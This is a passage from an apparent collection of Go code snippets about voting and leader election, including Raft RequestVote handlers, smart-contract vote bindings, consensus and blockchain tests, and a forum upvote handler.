args.CandidateID\n\t\t\trf.persist()\n\t\t}\n\t\treply.Granted = (rf.votedFor == args.CandidateID)\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\tif args.Term > rf.currentTerm {\n\t\trf.logger.Printf(\"Got vote request with term = %v, follow it\\n\", args.Term)\n\t\trf.state = FOLLOWER\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = -1\n\t\tif may_grant_vote {\n\t\t\trf.votedFor = args.CandidateID\n\t\t\trf.persist()\n\t\t}\n\t\trf.resetTimer()\n\n\t\treply.Granted = (rf.votedFor == args.CandidateID)\n\t\treply.Term = args.Term\n\t\treturn\n\t}\n}", "func (st *ProtoVoteStore) ProcessAttestation(index ValidatorIndex, blockRoot Root, headSlot Slot) (ok bool) {\n\tif index >= ValidatorIndex(len(st.votes)) {\n\t\tif index < ValidatorIndex(cap(st.votes)) {\n\t\t\tst.votes = st.votes[:index+1]\n\t\t} else {\n\t\t\textension := make([]VoteTracker, index+1-ValidatorIndex(len(st.votes)))\n\t\t\tst.votes = append(st.votes, extension...)\n\t\t}\n\t}\n\tvote := &st.votes[index]\n\ttargetEpoch := st.spec.SlotToEpoch(headSlot)\n\t// only update if it's a newer vote, or if it's genesis and no vote has happened yet.\n\tif targetEpoch > vote.NextTargetEpoch || (targetEpoch == 0 && *vote == (VoteTracker{})) {\n\t\tvote.NextTargetEpoch = targetEpoch\n\t\tvote.Next = NodeRef{Root: blockRoot, Slot: headSlot}\n\t\tst.changed = true\n\t}\n\t// TODO: maybe help detect slashable votes on the fly?\n\treturn true\n}", "func (_Contracts *ContractsFilterer) WatchNewVoter(opts *bind.WatchOpts, sink chan<- *ContractsNewVoter, _voter []common.Address) (event.Subscription, error) {\n\n\tvar _voterRule []interface{}\n\tfor _, _voterItem := range _voter {\n\t\t_voterRule = append(_voterRule, _voterItem)\n\t}\n\n\tlogs, sub, err := _Contracts.contract.WatchLogs(opts, \"NewVoter\", _voterRule)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn event.NewSubscription(func(quit <-chan struct{}) error {\n\t\tdefer sub.Unsubscribe()\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase log := <-logs:\n\t\t\t\t// New log arrived, parse the event and forward to the user\n\t\t\t\tevent := new(ContractsNewVoter)\n\t\t\t\tif err := _Contracts.contract.UnpackLog(event, \"NewVoter\", log); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tevent.Raw = log\n\n\t\t\t\tselect {\n\t\t\t\tcase sink <- event:\n\t\t\t\tcase err := <-sub.Err():\n\t\t\t\t\treturn err\n\t\t\t\tcase <-quit:\n\t\t\t\t\treturn nil\n\t\t\t\t}\n\t\t\tcase err := <-sub.Err():\n\t\t\t\treturn err\n\t\t\tcase <-quit:\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\t}), nil\n}", "func (_Contracts *ContractsTransactor) Vote(opts *bind.TransactOpts, _proposalId *big.Int, _positionId *big.Int, _candidateId *big.Int, _voterId *big.Int) (*types.Transaction, error) {\n\treturn _Contracts.contract.Transact(opts, \"vote\", _proposalId, _positionId, _candidateId, _voterId)\n}", "func viv(t *testing.T, ival, ivalok int, fname, test string) {\n\tif ival != ivalok {\n\t\tlog.Output(2, fmt.Sprintf(\n\t\t\t\"%s failed: %s: want %d got %d\",\n\t\t\tfname, test, ival, ivalok))\n\t\tt.Fail()\n\t} else if *verbose {\n\t\tlog.Output(2, fmt.Sprintf(\n\t\t\t\"%s passed: %s: want %d got %d\",\n\t\t\tfname, test, ival, ivalok))\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tif rf.currentTerm < args.Term {\n\t\trf.debug(\"Updating term to new term %v\\n\", args.Term)\n\t\trf.currentTerm = args.Term\n\t\tatomic.StoreInt32(&rf.state, FOLLOWER)\n\t\trf.votedFor = LEADER_UNKNOWN\n\t}\n\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\n\t// late candidates\n\tif args.Term < rf.currentTerm {\n\t\trf.debug(\"Rejecting candidate %v. Reason: late term=%v\\n\", args.CandidateId, args.Term)\n\t\treturn\n\t}\n\n\t// avoid double vote\n\tif rf.votedFor != LEADER_UNKNOWN && rf.votedFor != args.CandidateId {\n\t\trf.debug(\"Rejecting candidate %v. Reason: already voted\\n\", args.CandidateId)\n\t\treturn\n\t}\n\n\tlastLogIndex := rf.lastEntryIndex()\n\n\t// reject old logs\n\tif rf.index(lastLogIndex).Term > args.LastLogTerm {\n\t\trf.debug(\"Rejecting candidate %v. Reason: old log\\n\", args.CandidateId)\n\t\treturn\n\t}\n\n\t// log is smaller\n\tif rf.index(lastLogIndex).Term == args.LastLogTerm && args.LastLogIndex < lastLogIndex {\n\t\trf.debug(\"Rejecting candidate %v. Reason: small log\\n\", args.CandidateId)\n\t\treturn\n\t}\n\n\trf.votedFor = args.CandidateId\n\trf.gotContacted = true\n\n\trf.debug(\"Granting vote to %v. me=(%v,%v), candidate=(%v,%v)\\n\", args.CandidateId, lastLogIndex, rf.index(lastLogIndex).Term, args.LastLogIndex, args.LastLogTerm)\n\treply.VoteGranted = true\n\n\t// save state\n\trf.persist(false)\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\tDPrintf(\"peer-%d gets a RequestVote RPC.\", rf.me)\n\t// Your code here (2A, 2B).\n\t// First, we need to detect obsolete information\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tif args.Term < rf.currentTerm {\n\t\treply.VoteGranted = false\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\n\tstepdown := false\n\t// step down and convert to follower, adopt the args.Term\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\told_state := rf.state\n\t\trf.state = Follower\n\t\tif old_state == Leader {\n\t\t\trf.nonleaderCh <- true\n\t\t}\n\t\trf.votedFor = -1\n\t\trf.persist()\n\t\tstepdown = true\n\t}\n\n\t// 5.4.1 Election restriction : if the requester's log isn't more up-to-date than this peer's, don't vote for it.\n\t// check whether the requester's log is more up-to-date.(5.4.1 last paragraph)\n\tif len(rf.log) > 0 { // At first, there's no log entry in rf.log\n\t\tif rf.log[len(rf.log)-1].Term > args.LastLogTerm {\n\t\t\t// this peer's log is more up-to-date than requester's.\n\t\t\treply.VoteGranted = false\n\t\t\treply.Term = rf.currentTerm\n\t\t\treturn\n\t\t} else if rf.log[len(rf.log)-1].Term == args.LastLogTerm {\n\t\t\tif len(rf.log) > args.LastLogIndex {\n\t\t\t\t// this peer's log is more up-to-date than requester's.\n\t\t\t\treply.VoteGranted = false\n\t\t\t\treply.Term = rf.currentTerm\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n\n\t// requester's log is more up-to-date than requester's.\n\t// Then, we should check whether this server has voted for another server in the same term\n\tif stepdown {\n\t\trf.resetElectionTimeout()\n\t\t// now we need to reset the election timer.\n\t\trf.votedFor = args.CandidateId // First-come-first-served\n\t\trf.persist()\n\t\treply.VoteGranted = true\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\n\t/* Section 5.5 :\n\t * The server may crash after it completing an RPC but before responsing, then it will receive the same RPC again after it restarts.\n\t * Raft RPCs are idempotent, so this causes no harm.\n\t */\n\tif rf.votedFor == -1 || rf.votedFor == args.CandidateId {\n\t\trf.votedFor = args.CandidateId\n\t\trf.persist()\n\t\treply.VoteGranted = true\n\t} else {\n\t\treply.VoteGranted = false // First-come-first-served, this server has voted for another server before.\n\t}\n\treply.Term = rf.currentTerm\n\treturn\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tcurrentTerm := rf.currentTerm\n\tif args == nil {\n\t\tDPrintf(\"Peer-%d received a null vote request.\", rf.me)\n\t\treturn\n\t}\n\tcandidateTerm := args.Term\n\tcandidateId := args.Candidate\n\tDPrintf(\"Peer-%d received a vote request %v from peer-%d.\", rf.me, *args, candidateId)\n\tif candidateTerm < currentTerm {\n\t\tDPrintf(\"Peer-%d's term=%d > candidate's term=%d.\\n\", rf.me, currentTerm, candidateTerm)\n\t\treply.Term = currentTerm\n\t\treply.VoteGrant = false\n\t\treturn\n\t} else if candidateTerm == currentTerm {\n\t\tif rf.voteFor != -1 && rf.voteFor != candidateId {\n\t\t\tDPrintf(\"Peer-%d has grant to peer-%d before this request from peer-%d.\", rf.me, rf.voteFor, candidateId)\n\t\t\treply.Term = currentTerm\n\t\t\treply.VoteGrant = false\n\t\t\treturn\n\t\t}\n\t\tDPrintf(\"Peer-%d's term=%d == candidate's term=%d, to check index.\\n\", rf.me, currentTerm, candidateTerm)\n\t} else {\n\t\tDPrintf(\"Peer-%d's term=%d < candidate's term=%d.\\n\", rf.me, currentTerm, candidateTerm)\n\t\t// begin to update status\n\t\trf.currentTerm = candidateTerm // find larger term, up to date\n\t\trf.transitionState(NewTerm) // transition to Follower.\n\t\tgo func() {\n\t\t\trf.eventChan <- NewTerm // tell the electionService to change state.\n\t\t}()\n\t}\n\t// check whose log is up-to-date\n\tcandiLastLogIndex := args.LastLogIndex\n\tcandiLastLogTerm := args.LastLogTerm\n\tlocalLastLogIndex := len(rf.log) - 1\n\tlocalLastLogTerm := -1\n\tif localLastLogIndex >= 0 {\n\t\tlocalLastLogTerm = rf.log[localLastLogIndex].Term\n\t}\n\t// check term first, if term is the same, then check the index.\n\tDPrintf(\"Peer-%d try to check last entry, loacl: index=%d;term=%d, candi: index=%d,term=%d.\", rf.me, localLastLogIndex, localLastLogTerm, candiLastLogIndex, candiLastLogTerm)\n\tif localLastLogTerm > candiLastLogTerm {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGrant = false\n\t\treturn\n\t} else if localLastLogTerm == candiLastLogTerm {\n\t\tif localLastLogIndex > candiLastLogIndex {\n\t\t\treply.Term = rf.currentTerm\n\t\t\treply.VoteGrant = false\n\t\t\treturn\n\t\t}\n\t} else {\n\t}\n\t// heartbeat.\n\tgo func() {\n\t\trf.eventChan <- HeartBeat\n\t}()\n\t// local log are up-to-date, grant\n\t// before grant to candidate, we should reset ourselves state.\n\trf.transitionState(NewLeader)\n\trf.voteFor = candidateId\n\treply.Term = rf.currentTerm\n\treply.VoteGrant = true\n\tDPrintf(\"Peer-%d grant to peer-%d.\", rf.me, candidateId)\n\trf.persist()\n\treturn\n}", "func vote(w http.ResponseWriter, req *http.Request, upvote bool, isComment bool, t VoteRequest) error {\n\tif t.Id == \"\" {\n\t\treturn fmt.Errorf(\"missing post id\")\n\t}\n\ttable := \"posts\"\n\tif isComment {\n\t\ttable = \"comments\"\n\t}\n\trsp, err := client.DbService.Read(&db.ReadRequest{\n\t\tTable: table,\n\t\tId: t.Id,\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\tif len(rsp.Records) == 0 {\n\t\treturn fmt.Errorf(\"post or comment not found\")\n\t}\n\n\t// auth\n\tsessionRsp, err := client.UserService.ReadSession(&user.ReadSessionRequest{\n\t\tSessionId: t.SessionID,\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\tif sessionRsp.Session.UserId == \"\" {\n\t\treturn fmt.Errorf(\"user id not found\")\n\t}\n\n\t// prevent double votes\n\tcheckTable := table + \"votecheck\"\n\tcheckId := t.Id + sessionRsp.Session.UserId\n\tcheckRsp, err := client.DbService.Read(&db.ReadRequest{\n\t\tTable: checkTable,\n\t\tId: checkId,\n\t})\n\tmod := isMod(sessionRsp.Session.UserId, mods)\n\tif err == nil && (checkRsp != nil && len(checkRsp.Records) > 0) {\n\t\tif !mod {\n\t\t\treturn fmt.Errorf(\"already voted\")\n\t\t}\n\t}\n\tval := float64(1)\n\tif mod {\n\t\trand.Seed(time.Now().UnixNano())\n\t\tval = float64(rand.Intn(17-4) + 4)\n\t}\n\n\tif !mod {\n\t\t_, err = client.DbService.Create(&db.CreateRequest{\n\t\t\tTable: checkTable,\n\t\t\tRecord: map[string]interface{}{\n\t\t\t\t\"id\": checkId,\n\t\t\t},\n\t\t})\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\tobj := rsp.Records[0]\n\tkey := \"upvotes\"\n\tif !upvote {\n\t\tkey = \"downvotes\"\n\t}\n\n\tif _, ok := obj[\"upvotes\"].(float64); !ok {\n\t\tobj[\"upvotes\"] = float64(0)\n\t}\n\tif _, ok := obj[\"downvotes\"].(float64); !ok {\n\t\tobj[\"downvotes\"] = float64(0)\n\t}\n\n\tobj[key] = obj[key].(float64) + val\n\tobj[\"score\"] = obj[\"upvotes\"].(float64) - obj[\"downvotes\"].(float64)\n\n\t_, err = client.DbService.Update(&db.UpdateRequest{\n\t\tTable: table,\n\t\tId: t.Id,\n\t\tRecord: obj,\n\t})\n\treturn err\n}", "func (_Poll *PollFilterer) WatchVote(opts *bind.WatchOpts, sink chan<- *PollVote, voter []common.Address) (event.Subscription, error) {\n\n\tvar voterRule []interface{}\n\tfor _, voterItem := range voter {\n\t\tvoterRule = append(voterRule, voterItem)\n\t}\n\n\tlogs, sub, err := _Poll.contract.WatchLogs(opts, \"Vote\", voterRule)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn event.NewSubscription(func(quit <-chan struct{}) error {\n\t\tdefer sub.Unsubscribe()\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase log := <-logs:\n\t\t\t\t// New log arrived, parse the event and forward to the user\n\t\t\t\tevent := new(PollVote)\n\t\t\t\tif err := _Poll.contract.UnpackLog(event, \"Vote\", log); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tevent.Raw = log\n\n\t\t\t\tselect {\n\t\t\t\tcase sink <- event:\n\t\t\t\tcase err := <-sub.Err():\n\t\t\t\t\treturn err\n\t\t\t\tcase <-quit:\n\t\t\t\t\treturn nil\n\t\t\t\t}\n\t\t\tcase err := <-sub.Err():\n\t\t\t\treturn err\n\t\t\tcase <-quit:\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\t}), nil\n}", "func (rf *Raft) atLeastUptodate(candidateLastLogIdx int , candidateLastLogTerm int) bool{\n\trevLastLogIdx, revLastLogTerm := rf.lastLogIdxAndTerm()\n\n\tif candidateLastLogTerm > revLastLogTerm {\n\t\treturn true\n\t}else if candidateLastLogTerm < revLastLogTerm {\n\n\t\treturn false\n\t}else{\n\t\t//candidateLastLogTerm == revLastLogTerm\n\t\treturn candidateLastLogIdx >= revLastLogIdx\n\t}\n}", "func TestAutoRevocations(t *testing.T) {\n\tt.Parallel()\n\n\t// Use a set of test chain parameters which allow for quicker vote\n\t// activation as compared to various existing network params.\n\tparams := quickVoteActivationParams()\n\n\t// Clone the parameters so they can be mutated, find the correct\n\t// deployment for the automatic ticket revocations agenda, and, finally,\n\t// ensure it is always available to vote by removing the time constraints to\n\t// prevent test failures when the real expiration time passes.\n\tconst voteID = chaincfg.VoteIDAutoRevocations\n\tparams = cloneParams(params)\n\tversion, deployment := findDeployment(t, params, voteID)\n\tremoveDeploymentTimeConstraints(deployment)\n\n\t// Shorter versions of useful params for convenience.\n\tcoinbaseMaturity := params.CoinbaseMaturity\n\tstakeValidationHeight := params.StakeValidationHeight\n\truleChangeInterval := int64(params.RuleChangeActivationInterval)\n\n\t// Create a test harness initialized with the genesis block as the tip.\n\tg := newChaingenHarness(t, params)\n\n\t// replaceAutoRevocationsVersions is a munge function which modifies the\n\t// provided block by replacing the block, stake, vote, and revocation\n\t// transaction versions with the versions associated with the automatic\n\t// ticket revocations deployment.\n\treplaceAutoRevocationsVersions := func(b *wire.MsgBlock) {\n\t\tchaingen.ReplaceBlockVersion(int32(version))(b)\n\t\tchaingen.ReplaceStakeVersion(version)(b)\n\t\tchaingen.ReplaceVoteVersions(version)(b)\n\t\tchaingen.ReplaceRevocationVersions(stake.TxVersionAutoRevocations)(b)\n\t}\n\n\t// ---------------------------------------------------------------------\n\t// Generate and accept enough blocks with the appropriate vote bits set to\n\t// reach one block prior to the automatic ticket revocations agenda becoming\n\t// active.\n\t// ---------------------------------------------------------------------\n\n\tg.AdvanceToStakeValidationHeight()\n\tg.AdvanceFromSVHToActiveAgendas(voteID)\n\tactiveAgendaHeight := uint32(stakeValidationHeight + ruleChangeInterval*3 - 1)\n\tg.AssertTipHeight(activeAgendaHeight)\n\n\t// Ensure the automatic ticket revocations agenda is active.\n\ttipHash := &g.chain.BestSnapshot().Hash\n\tgotActive, err := g.chain.IsAutoRevocationsAgendaActive(tipHash)\n\tif err != nil {\n\t\tt.Fatalf(\"error checking auto revocations agenda status: %v\", err)\n\t}\n\tif !gotActive {\n\t\tt.Fatal(\"expected auto revocations agenda to be active\")\n\t}\n\n\t// ---------------------------------------------------------------------\n\t// Generate enough blocks to have a known distance to the first mature\n\t// coinbase outputs for all tests that follow. These blocks continue to\n\t// purchase tickets to avoid running out of votes.\n\t//\n\t// ... -> bsv# -> bbm0 -> bbm1 -> ... -> bbm#\n\t// ---------------------------------------------------------------------\n\n\tfor i := uint16(0); i < coinbaseMaturity; i++ {\n\t\touts := g.OldestCoinbaseOuts()\n\t\tblockName := fmt.Sprintf(\"bbm%d\", i)\n\t\tg.NextBlock(blockName, nil, outs[1:], replaceAutoRevocationsVersions)\n\t\tg.SaveTipCoinbaseOuts()\n\t\tg.AcceptTipBlock()\n\t}\n\tg.AssertTipHeight(activeAgendaHeight + uint32(coinbaseMaturity))\n\n\t// Collect spendable outputs into two different slices. The outs slice is\n\t// intended to be used for regular transactions that spend from the output,\n\t// while the ticketOuts slice is intended to be used for stake ticket\n\t// purchases.\n\tvar outs []*chaingen.SpendableOut\n\tvar ticketOuts [][]chaingen.SpendableOut\n\tfor i := uint16(0); i < coinbaseMaturity; i++ {\n\t\tcoinbaseOuts := g.OldestCoinbaseOuts()\n\t\touts = append(outs, &coinbaseOuts[0])\n\t\tticketOuts = append(ticketOuts, coinbaseOuts[1:])\n\t}\n\n\t// Create a block that misses a vote and does not contain a revocation for\n\t// that missed vote.\n\t//\n\t// ...\n\t// \\-> b1(0)\n\tstartTip := g.TipName()\n\tg.NextBlock(\"b1\", outs[0], ticketOuts[0], g.ReplaceWithNVotes(4),\n\t\treplaceAutoRevocationsVersions)\n\tg.AssertTipNumRevocations(0)\n\tg.RejectTipBlock(ErrNoMissedTicketRevocation)\n\n\t// Create a block that misses a vote and contains a version 1 revocation\n\t// transaction.\n\t//\n\t// ...\n\t// \\-> b2(0)\n\tg.SetTip(startTip)\n\tg.NextBlock(\"b2\", outs[0], ticketOuts[0], g.ReplaceWithNVotes(4),\n\t\tg.CreateRevocationsForMissedTickets(), replaceAutoRevocationsVersions,\n\t\tchaingen.ReplaceRevocationVersions(1))\n\tg.AssertTipNumRevocations(1)\n\tg.RejectTipBlock(ErrInvalidRevocationTxVersion)\n\n\t// Create a block that misses a vote and contains a revocation with a\n\t// non-zero fee.\n\t//\n\t// ...\n\t// \\-> b3(0)\n\tg.SetTip(startTip)\n\tg.NextBlock(\"b3\", outs[0], ticketOuts[0], g.ReplaceWithNVotes(4),\n\t\tg.CreateRevocationsForMissedTickets(), replaceAutoRevocationsVersions,\n\t\tfunc(b *wire.MsgBlock) {\n\t\t\tfor _, stx := range b.STransactions {\n\t\t\t\tif !stake.IsSSRtx(stx) {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\n\t\t\t\t// Decrement the first output value to create a non-zero fee and\n\t\t\t\t// return so that only a single revocation transaction is\n\t\t\t\t// modified.\n\t\t\t\tstx.TxOut[0].Value--\n\t\t\t\treturn\n\t\t\t}\n\t\t})\n\tg.AssertTipNumRevocations(1)\n\t// Note that this will fail with ErrRegTxCreateStakeOut rather than hitting\n\t// the later error case of ErrBadPayeeValue since a revocation with a\n\t// non-zero fee will not be identified as a revocation if the automatic\n\t// ticket revocations agenda is active.\n\tg.RejectTipBlock(ErrRegTxCreateStakeOut)\n\n\t// Create a valid block that misses multiple votes and contains revocation\n\t// transactions for those votes.\n\t//\n\t// ... -> b4(0)\n\tg.SetTip(startTip)\n\tg.NextBlock(\"b4\", outs[0], ticketOuts[0], g.ReplaceWithNVotes(3),\n\t\tg.CreateRevocationsForMissedTickets(), replaceAutoRevocationsVersions)\n\tg.AssertTipNumRevocations(2)\n\tg.AcceptTipBlock()\n\n\t// Create a slice of the ticket hashes that revocations spent in the tip\n\t// block that was just connected.\n\trevocationTicketHashes := make([]chainhash.Hash, 0, params.TicketsPerBlock)\n\tfor _, stx := range g.Tip().STransactions {\n\t\t// Append revocation ticket hashes.\n\t\tif stake.IsSSRtx(stx) {\n\t\t\tticketHash := stx.TxIn[0].PreviousOutPoint.Hash\n\t\t\trevocationTicketHashes = append(revocationTicketHashes, ticketHash)\n\n\t\t\tcontinue\n\t\t}\n\t}\n\n\t// Validate that the revocations are now in the revoked ticket treap in the\n\t// ticket database.\n\ttipHash = &g.chain.BestSnapshot().Hash\n\tblockNode := g.chain.index.LookupNode(tipHash)\n\tstakeNode, err := g.chain.fetchStakeNode(blockNode)\n\tif err != nil {\n\t\tt.Fatalf(\"error fetching stake node: %v\", err)\n\t}\n\tfor _, revocationTicketHash := range revocationTicketHashes {\n\t\tif !stakeNode.ExistsRevokedTicket(revocationTicketHash) {\n\t\t\tt.Fatalf(\"expected ticket %v to exist in the revoked ticket treap\",\n\t\t\t\trevocationTicketHash)\n\t\t}\n\t}\n\n\t// Invalidate the previously connected block so that it is disconnected.\n\tg.InvalidateBlockAndExpectTip(\"b4\", nil, startTip)\n\n\t// Validate that the revocations from the disconnected block are now back in\n\t// the live ticket treap in the ticket database.\n\ttipHash = &g.chain.BestSnapshot().Hash\n\tblockNode = g.chain.index.LookupNode(tipHash)\n\tstakeNode, err = g.chain.fetchStakeNode(blockNode)\n\tif err != nil {\n\t\tt.Fatalf(\"error fetching stake node: %v\", err)\n\t}\n\tfor _, revocationTicketHash := range revocationTicketHashes {\n\t\tif !stakeNode.ExistsLiveTicket(revocationTicketHash) {\n\t\t\tt.Fatalf(\"expected ticket %v to exist in the live ticket treap\",\n\t\t\t\trevocationTicketHash)\n\t\t}\n\t}\n}", "func (s ReplicaServer) Vote(ctx context.Context, req *proto.VoteReq) (*proto.VoteResp, error) {\n\ts.R.mu.Lock()\n\tdefer s.R.mu.Unlock()\n\n\ts.R.lastPinged = time.Now()\n\n\tif !s.R.voted[req.Term] && req.Term >= s.R.term && req.LastIndex >= int64(len(s.R.log)-1) {\n\t\ts.R.leader = -1\n\t\ts.R.term = req.Term\n\t\ts.R.voted[req.Term] = true\n\t\treturn &proto.VoteResp{}, nil\n\t}\n\n\treturn &proto.VoteResp{}, errors.New(\"Rejecting vote request\")\n}", "func TestRevisionIsNewerWithTimeStamp(t *testing.T) {\n\toriginalAllowedNTPDiff := allowedNTPDiffInMilliSecond\n\ttestRevisionIsNewer(t, 0)\n\ttestRevisionIsNewer(t, 500)\n\ttestRevisionIsNewer(t, 1000)\n\ttestRevisionIsNewer(t, 10000)\n\tallowedNTPDiffInMilliSecond = originalAllowedNTPDiff\n}", "func TestOnlineElection(t *testing.T) {\n\tvar cases = []struct {\n\t\tpersons []int\n\t\ttimes []int\n\t\tq []int\n\t\ta []int\n\t}{\n\t\t//{\n\t\t//\tpersons: []int{0, 1, 1, 0, 0, 1, 0},\n\t\t//\ttimes: []int{0, 5, 10, 15, 20, 25, 30},\n\t\t//\tq: []int{3, 12, 25, 15, 24, 8},\n\t\t//\ta: []int{0, 1, 1, 0, 0, 1},\n\t\t//},\n\t\t{\n\t\t\tpersons: []int{0, 1, 0, 1, 1},\n\t\t\ttimes: []int{24, 29, 31, 76, 81},\n\t\t\tq: []int{28, 24, 29, 77, 30, 25, 76, 75, 81, 80},\n\t\t\ta: []int{0, 0, 1, 1, 1, 0, 1, 0, 1, 1},\n\t\t},\n\t}\n\tfor _, c := range cases {\n\t\tvote := Constructor(c.persons, c.times)\n\t\tfor i := 0; i < len(c.q); i++ {\n\t\t\tif vote.Q(c.q[i]) != c.a[i] {\n\t\t\t\tt.Fail()\n\t\t\t}\n\t\t}\n\t}\n}", "func TestLeaderElectionJumpToGreaterView(t *testing.T) {\n\tp := newPaxos(&Config{ID: 1, NodeCount: 5})\n\n\tif p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected unset progress timer\")\n\t}\n\tif p.prepare != nil {\n\t\tt.Fatalf(\"expected nil *pb.Prepare\")\n\t}\n\tif exp, a := uint64(0), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d; found %d\", exp, a)\n\t}\n\tassertLeaderElectionState := func(expLastAttempted, expViewChanges int) {\n\t\tassertState(t, p, StateLeaderElection)\n\t\tif exp, a := uint64(expLastAttempted), p.lastAttempted; a != exp {\n\t\t\tt.Fatalf(\"expected last attempted view %d; found %d\", exp, a)\n\t\t}\n\t\tif exp, a := expViewChanges, len(p.viewChanges); a != exp {\n\t\t\tt.Fatalf(\"expected %d ViewChange message, found %d\", exp, a)\n\t\t}\n\t}\n\tassertLeaderElectionState(1, 1)\n\n\t// ViewChange message from node 0 should be applied successfully.\n\tvc := &pb.ViewChange{NodeId: 0, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message for larger view should replace current attempt.\n\tvc = &pb.ViewChange{NodeId: 2, AttemptedView: 6}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(6, 2)\n\n\t// ViewChange message from node 1 should be applied successfully.\n\t// Leader election should complete, because quorum of 3 nodes achieved.\n\tvc = &pb.ViewChange{NodeId: 3, AttemptedView: 6}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(6, 3)\n\tif exp, a := uint64(6), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d after leader election; found %d\", exp, a)\n\t}\n\tif !p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected progress timer to be set after completed leader election\")\n\t}\n}", "func TestVoterSet_VerifyCommit_All(t *testing.T) {\n\tvar (\n\t\tprivKey = ed25519.GenPrivKey()\n\t\tpubKey = privKey.PubKey()\n\t\tv1 = NewValidator(pubKey, 1000)\n\t\tvset = ToVoterAll([]*Validator{v1})\n\n\t\tchainID = \"Lalande21185\"\n\t)\n\n\tvote := examplePrecommit()\n\tvote.ValidatorAddress = pubKey.Address()\n\tv := vote.ToProto()\n\tsig, err := privKey.Sign(VoteSignBytes(chainID, v))\n\trequire.NoError(t, err)\n\tvote.Signature = sig\n\n\tcommit := NewCommit(vote.Height, vote.Round, vote.BlockID, []CommitSig{vote.CommitSig()})\n\n\tvote2 := *vote\n\tsig2, err := privKey.Sign(VoteSignBytes(\"EpsilonEridani\", v))\n\trequire.NoError(t, err)\n\tvote2.Signature = sig2\n\n\ttestCases := []struct {\n\t\tdescription string\n\t\tchainID string\n\t\tblockID BlockID\n\t\theight int64\n\t\tcommit *Commit\n\t\texpErr bool\n\t}{\n\t\t{\"good\", chainID, vote.BlockID, vote.Height, commit, false},\n\n\t\t{\"wrong signature (#0)\", \"EpsilonEridani\", vote.BlockID, vote.Height, commit, true},\n\t\t{\"wrong block ID\", chainID, makeBlockIDRandom(), vote.Height, commit, true},\n\t\t{\"wrong height\", chainID, vote.BlockID, vote.Height - 1, commit, true},\n\n\t\t{\"wrong set size: 1 vs 0\", chainID, vote.BlockID, vote.Height,\n\t\t\tNewCommit(vote.Height, vote.Round, vote.BlockID, []CommitSig{}), true},\n\n\t\t{\"wrong set size: 1 vs 2\", chainID, vote.BlockID, vote.Height,\n\t\t\tNewCommit(vote.Height, vote.Round, vote.BlockID,\n\t\t\t\t[]CommitSig{vote.CommitSig(), {BlockIDFlag: BlockIDFlagAbsent}}), true},\n\n\t\t{\"insufficient voting power: got 0, needed more than 666\", chainID, vote.BlockID, vote.Height,\n\t\t\tNewCommit(vote.Height, vote.Round, vote.BlockID, []CommitSig{{BlockIDFlag: BlockIDFlagAbsent}}), true},\n\n\t\t{\"wrong signature (#0)\", chainID, vote.BlockID, vote.Height,\n\t\t\tNewCommit(vote.Height, vote.Round, vote.BlockID, []CommitSig{vote2.CommitSig()}), true},\n\t}\n\n\tfor _, tc := range testCases {\n\t\ttc := tc\n\t\tt.Run(tc.description, func(t *testing.T) {\n\t\t\terr := vset.VerifyCommit(tc.chainID, tc.blockID, tc.height, tc.commit)\n\t\t\tif tc.expErr {\n\t\t\t\tif assert.Error(t, err, \"VerifyCommit\") {\n\t\t\t\t\tassert.Contains(t, err.Error(), tc.description, \"VerifyCommit\")\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tassert.NoError(t, err, \"VerifyCommit\")\n\t\t\t}\n\n\t\t\terr = vset.VerifyCommitLight(tc.chainID, tc.blockID, tc.height, tc.commit)\n\t\t\tif tc.expErr {\n\t\t\t\tif assert.Error(t, err, \"VerifyCommitLight\") {\n\t\t\t\t\tassert.Contains(t, err.Error(), tc.description, \"VerifyCommitLight\")\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tassert.NoError(t, err, \"VerifyCommitLight\")\n\t\t\t}\n\t\t})\n\t}\n}", "func (r *Raft) AddVoter(id ServerID, address ServerAddress, prevIndex uint64, timeout time.Duration) IndexFuture {\n\treturn r.requestConfigChange(configurationChangeRequest{\n\t\tcommand: AddVoter,\n\t\tserverID: id,\n\t\tserverAddress: address,\n\t\tprevIndex: prevIndex,\n\t}, timeout)\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tdefer rf.persist()\n\n\treply.VoteGranted = 